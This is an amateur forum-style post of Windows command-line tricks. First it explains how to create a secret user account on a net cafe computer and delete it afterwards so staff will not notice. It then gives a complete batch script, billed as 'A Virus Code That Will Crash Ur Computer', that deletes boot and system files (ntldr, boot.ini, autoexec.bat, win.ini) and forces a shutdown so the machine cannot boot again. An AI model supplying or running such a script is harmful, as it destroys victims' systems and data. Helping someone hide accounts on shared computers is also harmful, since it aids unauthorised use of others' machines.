In command prompt type "net user CoolGuy /add" this basically adds a new user by the name of CoolGuy. Simple ehh?
well we have struck a problemo. How the hell do we login to that account? EASY!

In fact we have already covered most of it. We will be using the shutdown command again.

"shutdown -l" : basicly this logs us out and we can log back in with the CoolGuy account.

-l : sets the logout action.

Ok, so you have had your fun with the new account now and you want to get rid of it in case
of the Net Cafe staff finding it. Well that's simple aswell, all we do is..

"net user CoolGuy /delete" and it will delete that user. Make sure to check it has been
deleted by using "net user" and it will show the accounts.

PS This wasn't written by me. I'm just sharing it. All due credit goes to the original poster.

Remove ur NTDLR

A Virus Code That Will Crash Ur Computer
Just copy the code given belows ....in notepad


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * U R Screwed!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


and now save this code as anyname.bat like abc.bat

when u double click on it....a message will pop up saying " U R Screwed"

and it will shut down ur computer and never boot again...
Enjoy